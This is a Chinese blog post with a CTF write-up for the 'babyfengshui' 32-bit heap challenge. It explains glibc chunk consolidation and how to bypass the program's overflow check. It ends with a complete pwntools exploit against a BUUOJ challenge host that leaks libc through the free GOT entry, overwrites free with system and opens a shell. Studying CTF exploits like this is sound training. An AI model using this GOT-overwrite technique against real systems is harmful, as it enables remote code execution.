<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"a1ph0nse.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这是一个32位的堆题，堆风水。">
<meta property="og:type" content="article">
<meta property="og:title" content="babyfengshui">
<meta property="og:url" content="https://a1ph0nse.github.io/2023/01/02/babyfengshui/index.html">
<meta property="og:site_name" content="a1ph0nse">
<meta property="og:description" content="这是一个32位的堆题，堆风水。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/95368/Documents/GitHub/pwn-study-diary/wp/babyfengshui/picture/check.png">
<meta property="article:published_time" content="2023-01-02T11:54:26.000Z">
<meta property="article:modified_time" content="2023-01-02T13:53:56.000Z">
<meta property="article:author" content="a1ph0nse">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/95368/Documents/GitHub/pwn-study-diary/wp/babyfengshui/picture/check.png">

<link rel="canonical" href="https://a1ph0nse.github.io/2023/01/02/babyfengshui/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>babyfengshui | a1ph0nse</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">a1ph0nse</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">一个菜狗的挣扎</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://a1ph0nse.github.io/2023/01/02/babyfengshui/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="a1ph0nse">
      <meta itemprop="description" content="pwn菜狗、cs菜鸡">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="a1ph0nse">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          babyfengshui
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-01-02 19:54:26 / 修改时间：21:53:56" itemprop="dateCreated datePublished" datetime="2023-01-02T19:54:26+08:00">2023-01-02</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn-wp/" itemprop="url" rel="index"><span itemprop="name">pwn_wp</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这是一个32位的堆题，堆风水。</p>
<span id="more"></span>

<p>查壳<br><img src="C:\Users\95368\Documents\GitHub\pwn-study-diary\wp\babyfengshui\picture\check.png" alt="check"></p>
<p>是一个菜单，里面的user结构大概如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">user</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    <span class="type">char</span>* description;<span class="comment">//根据输入的size申请</span></span><br><span class="line">    <span class="type">char</span> name[<span class="number">124</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//在申请的0x80的chunk（user）中，第一个4byte是description的指针，后面存放的是name</span></span><br></pre></td></tr></table></figure>

<p>在update函数中，有一个对堆溢出的检测</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 防止description的chunk溢出到该userchunk的size，但是可以溢出到pre_size</span></span><br><span class="line"><span class="comment">// 而且可能只有一开始chunk比较整齐的时候有用，若经过申请和释放description和user的chunk不连续，则失效</span></span><br><span class="line"><span class="keyword">if</span> ( (<span class="type">char</span> *)(length + *(_DWORD *)*(&amp;ptr + index)) &gt;= (<span class="type">char</span> *)*(&amp;ptr + index) - <span class="number">4</span> )</span><br><span class="line">&#123;                                           </span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;my l33t defenses cannot be fooled, cya!&quot;</span>);</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>if中条件的意思是：description中写的范围最多到该description的user的size位前。</p>
<p>由于在add user的函数中，先malloc的是description的chunk，因此可以防止update时溢出到user的size以及后面的数据。</p>
<p>但是，如果先申请的user被delete了，释放的user和description可能会在后续的过程中（甚至释放的时候）被合并，那么在后面申请新的user时，若合并后的部分不足以容纳新的description和user，则会造成description和其user并不连续，该防护就会不起作用，而我们要做的就是造成这种合并。</p>
<p><strong>consolidate的机制（合并）</strong></p>
<p>在malloc和free的时候都可能会出现合并的情况</p>
<p><strong>malloc的情况：</strong></p>
<p>malloc中的合并通常都是调用malloc_consolidate()函数对fast bins进行整理。当在small bins中查找时，若small bins尚未初始化，则合并fast bins中的chunk。当fast bins 和 small bins 中的chunk的大小都不能满足时，在large bins中查找，首先会调用malloc_consolidate()对进行fast bins chunk进行合并，可以合并的合并后放到unsorted bin，不能合并的直接放到unsorted bin中。如果top chunk也不能满足需求，会先调用malloc_consolidate()对fast bins chunk进行合并后再重新进行一次分配。</p>
<p>malloc_consolidate()有两个作用：1.若fast bins未初始化，则初始化malloc_state;2.否则，合并fast bins中的chunk。</p>
<p><strong>free的情况：</strong></p>
<p>如果<strong>chunk的大小不在fast bin的范围内</strong>，free会尝试进行合并。合并首先考虑与<strong>物理低地址</strong>的相邻空闲chunk，再考虑<strong>物理高地址</strong>的相邻空闲chunk（两个chunk都不能是top chunk）。如果下一个chunk是top chunk，则当前chunk会合并到top chunk，并修改top chunk的大小。</p>
<p>如果合并后的 chunk 大小大于 64KB，并且 fast bins 中存在空闲 chunk，调用 malloc_consolidate()函数合并 fast bins 中的空闲 chunk 到 unsorted bin 中。</p>
<p>对chunk进行合理的布局后，经过恰当的释放和申请，让新申请的description和user不连续，则可以在update函数实现堆溢出，在update函数中，从user的前4byte（description）指向的位置开始，可以写到该user的size字段前。</p>
<p>在知道了这些之后，首先要考虑怎样才能<strong>泄露libc</strong>。</p>
<p>在这道题目中，有display的功能，可以输出description的内容。其具体的过程是利用printf函数输出user的第一个4byte所指向的内容。这里原本存放的是description的指针，如果通过堆溢出将其<strong>修改为got表项的地址</strong>，则可以输出一个函数的真实地址，并由此得到libc。</p>
<p>得到libc之后，就可以考虑如何<strong>get shell</strong>。</p>
<p>在update中我们可以注意到，写入description是写入user的前4byte指向的位置。在一般情况下，这个指针指向的是description，但在我们泄露libc的过程中，我们其实是可以对其他user的description指针所在位置进行修改的。如果我们对这个指针修改后再执行update，对写入该指针指向的位置，利用这点，我们可以将某一函数的got表项覆盖为system函数。</p>
<p>在此时，free函数就是个不错的选择，在delete user的时候，对调用free对user前四位指向的chunk进行释放，如果我们将free修改为system函数，并将要free的user的description设置为”/bin/sh\x00”，则可以执行system(“/bin/sh\x00”)。</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span>*</span><br><span class="line">elf=ELF(<span class="string">&quot;./babyfengshui&quot;</span>)</span><br><span class="line"><span class="comment">#p=process(&quot;./babyfengshui&quot;)</span></span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28361</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_user</span>(<span class="params">size,name,length,text</span>):</span><br><span class="line">  p.recvuntil(<span class="string">&#x27;Action: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;size of description: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;name: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(name))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;text length: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(length))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;text: &#x27;</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">del_user</span>(<span class="params">idx</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;Action: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;index: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">display</span>(<span class="params">idx</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;Action: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;index: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">update</span>(<span class="params">idx,length,text</span>):</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;Action: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;index: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(idx))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;text length: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(length))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;text: &#x27;</span>)</span><br><span class="line">	p.sendline(text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add_user(<span class="number">0x80</span>,<span class="string">&#x27;chunk0&#x27;</span>,<span class="number">0x80</span>,<span class="string">&#x27;nothing&#x27;</span>)</span><br><span class="line">add_user(<span class="number">0x80</span>,<span class="string">&#x27;chunk1&#x27;</span>,<span class="number">0x80</span>,<span class="string">&#x27;nothing&#x27;</span>)</span><br><span class="line">add_user(<span class="number">0x8</span>,<span class="string">&#x27;chunk2&#x27;</span>,<span class="number">0x8</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">del_user(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> (<span class="string">&#x27;this is got : &#x27;</span> + <span class="built_in">hex</span>(elf.got[<span class="string">&#x27;free&#x27;</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">add_user(<span class="number">0x108</span>,<span class="string">&#x27;chunk0_0&#x27;</span>,<span class="number">0x19c</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x198</span>+p32(elf.got[<span class="string">&#x27;free&#x27;</span>]))</span><br><span class="line"></span><br><span class="line">display(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;description: &#x27;</span>)</span><br><span class="line">data=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(data)</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;free&#x27;</span>,data)</span><br><span class="line">libcbase=data-libc.dump(<span class="string">&#x27;free&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span> libcbase</span><br><span class="line"></span><br><span class="line">sys=libcbase+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"></span><br><span class="line">update(<span class="number">1</span>,<span class="number">4</span>,p32(sys))</span><br><span class="line">del_user(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/heap/" rel="tag"># heap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/01/02/buffer_fly/" rel="prev" title="buffer_fly">
      <i class="fa fa-chevron-left"></i> buffer_fly
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/01/02/Read&Write/" rel="next" title="Read&Write">
      Read&Write <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="a1ph0nse"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">a1ph0nse</p>
  <div class="site-description" itemprop="description">pwn菜狗、cs菜鸡</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">76</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">a1ph0nse</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
